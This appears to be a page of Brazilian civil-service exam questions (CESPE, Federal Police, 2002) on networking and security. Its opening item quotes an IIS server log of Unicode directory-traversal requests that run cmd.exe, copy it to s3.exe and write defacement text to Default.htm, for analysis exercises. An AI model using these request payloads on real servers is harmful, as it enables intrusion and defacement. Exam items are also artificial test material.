Magna Concursos

Foram encontradas 250 questões.

287149 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38


Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.


atacker1.nowhere.com - - [01/Nov/2000:18:20:49 +0000] "GET

/scripts/..%C0%AF../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 404 306

atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET

/scripts/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker2.nowhere.com - - [11/Jan/2001:09:24:05 +0000] "GET

/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c

0%af..%c0%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 346

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/

winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 342

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET /cgibin/..%

c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af/wi

nnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0

%af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 345

atacker2.nowhere.com - - [11/Jan/2001:09:24:06 +0000] "GET

/wwwroot/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%

af/winnt/system32/cmd.exe?/c%20dir HTTP/1.1" 404 344

atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET

/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461

atacker3.nowhere.com - - [19/Jan/2001:08:18:37 -0200] "GET

/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: HTTP/1.0" 404 461

atacker4.nowhere.com - - [22/Jan/2001:21:19:27 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.0" 200 607

atacker4.nowhere.com - - [22/Jan/2001:21:19:49 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:d:\ HTTP/1.0" 502 283

atacker4.nowhere.com - - [22/Jan/2001:21:20:08 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+d:\ HTTP/1.0" 200 342

atacker4.nowhere.com - - [22/Jan/2001:21:20:25 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+e:\ HTTP/1.0" 200 543

atacker5.nowhere.com - - [23/Jan/2001:04:28:41 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1" 200 607

atacker5.nowhere.com - - [23/Jan/2001:04:29:00 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub HTTP/1.1" 200 493

atacker5.nowhere.com - - [23/Jan/2001:04:29:06 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c:\inetpub\wwwroot HTTP/1.1" 200 828

atacker6.nowhere.com - - [23/Jan/2001:04:30:02 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\s3.exe

HTTP/1.0" 502 259

atacker6.nowhere.com - - [23/Jan/2001:04:32:29 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\cmd.exe+c:\winnt\cmd.exe

HTTP/1.0" 502 259

atacker6.nowhere.com - - [23/Jan/2001:04:33:36 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe+c:\winnt\s3.exe

HTTP/1.0" 502 242

atacker6.nowhere.com - - [23/Jan/2001:04:34:11 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1

th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87

atacker6.nowhere.com - - [23/Jan/2001:04:34:28 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1

th+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 500 87

atacker6.nowhere.com - - [23/Jan/2001:04:35:55 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1t

h+Grup+WebQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 404 461

atacker6.nowhere.com - - [23/Jan/2001:04:37:34 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215

atacker6.nowhere.com - - [23/Jan/2001:04:40:09 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\Default.htm HTTP/1.0" 502 215

atacker6.nowhere.com - - [23/Jan/2001:04:40:30 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215

atacker4.nowhere.com - - [23/Jan/2001:04:40:51 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/system32/cmd.exe?/c+dir+c: HTTP/1.1" 200 880

atacker6.nowhere.com - - [23/Jan/2001:04:44:38 -0200] "GET

/IISADMPWD/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af...%c0%af..%c0%af..%

c0%af/winnt/s3.exe?/c+echo+H4ck3d+by+Gund3R0th+thanks+Gund3R1th+Grup+We

bQu33R+>c:\inetpub\wwwroot\myweb.dll HTTP/1.0" 502 215


Ainda com base no texto CE, julgue os itens subseqüentes, relativos ao servidor http e aos ataques ocorridos.

A página vulnerada se apresentou em branco com os dizeres "H4ck3d by Gund3R0th thanks Gund3R1th Grup WebQu33R".

 

Provas

Questão presente nas seguintes provas
287148 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

Enunciado 3316697-1

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

O atacante fez uma cópia de backup da página original.

 

Provas

Questão presente nas seguintes provas
287147 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

Enunciado 3316696-1

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

Os logs foram gerados pelo MS IIS.

 

Provas

Questão presente nas seguintes provas
287143 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

Enunciado 3316695-1

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

A vulnerabilidade explorada nos ataques é a do parsing das requisições de arquivo em servidores Web, também conhecida como ataque de unicode, presente no MS IIS versão 5.0.

 

Provas

Questão presente nas seguintes provas
287142 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

Enunciado 3316694-1

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

Verifica-se ataque de defacement (pichação) a página Web.

 

Provas

Questão presente nas seguintes provas
287141 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Texto CE – questões de 36 a 38

Os trechos abaixo foram retirados de um arquivo de log referente a acessos a um servidor http.

Enunciado 3316693-1

Com base no texto CE, julgue os itens abaixo, referentes aos ataques ao servidor http mencionado nesse texto.

As tentativas exploratórias começaram a ter sucesso a partir de 23/1/2001.

 

Provas

Questão presente nas seguintes provas
287140 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

A integridade da informação é considerada uma das propriedades fundamentais da segurança da informação. Os protocolos de redes de comunicação, com o objetivo de garantir a integridade da informação durante as comunicações, empregam vários procedimentos específicos que trabalham com base em campos de controle definidos dentro das próprias unidades de dados dos protocolos, a exemplo dos campos destinados a seqüenciamento da informação, reconhecimento das transmissões e verificação de erros de transmissão. Acerca dos campos de verificação de erros nos protocolos de redes, julgue os itens a seguir.

Nas células ATM, o campo de 8 bits header error control (HEC), calculado a partir de apenas 32 bits do restante do cabeçalho, permite tanto a detecção de erros, quanto, em alguns casos, a correção deles.

 

Provas

Questão presente nas seguintes provas
287129 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Reconhecendo que a segurança do protocolo IP é um importante aspecto no contexto de uma rede segura com arquitetura TCP/IP, o IETF vem publicando várias RFCs que definem uma capacidade específica de segurança no nível IP (IPSec), incluindo funcionalidades de autentificação e de confidencialidade como extensões para esse protocolo nas suas versões 4 e 6. Acerca do IPSec, julgue os itens abaixo.

O mecanismo de authentication header (AH) do IPSec provê suporte tanto para a integridade dos dados, quanto para a autentificação dos pacotes IP.

 

Provas

Questão presente nas seguintes provas
287128 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Considere uma rede em que há a suspeita da existência de um sniffer instalado em uma das máquinas que compõem a rede, realizando escutas desautorizadas. Com relação a essa situação, julgue os itens abaixo.

Constitui boa estratégia de detecção de sniffer aquela que se fundamenta na identificação do tráfego gerado por ele durante a escuta, tráfego que normalmente acontece em grande quantidade, seja o sniffer em redes comutadas ou não.

 

Provas

Questão presente nas seguintes provas
287124 Ano: 2002
Disciplina: TI - Redes de Computadores
Banca: CESPE / CEBRASPE
Orgão: PF

Reconhecendo que a segurança do protocolo IP é um importante aspecto no contexto de uma rede segura com arquitetura TCP/IP, o IETF vem publicando várias RFCs que definem uma capacidade específica de segurança no nível IP (IPSec), incluindo funcionalidades de autentificação e de confidencialidade como extensões para esse protocolo nas suas versões 4 e 6. Acerca do IPSec, julgue os itens abaixo.

Um conceito-chave que aparece tanto nos mecanismos de autentificação, quanto de confidencialidade do IPSec é a associação de segurança. Uma associação desse tipo consiste em um relacionamento bidirecional entre um transmissor e um receptor.

 

Provas

Questão presente nas seguintes provas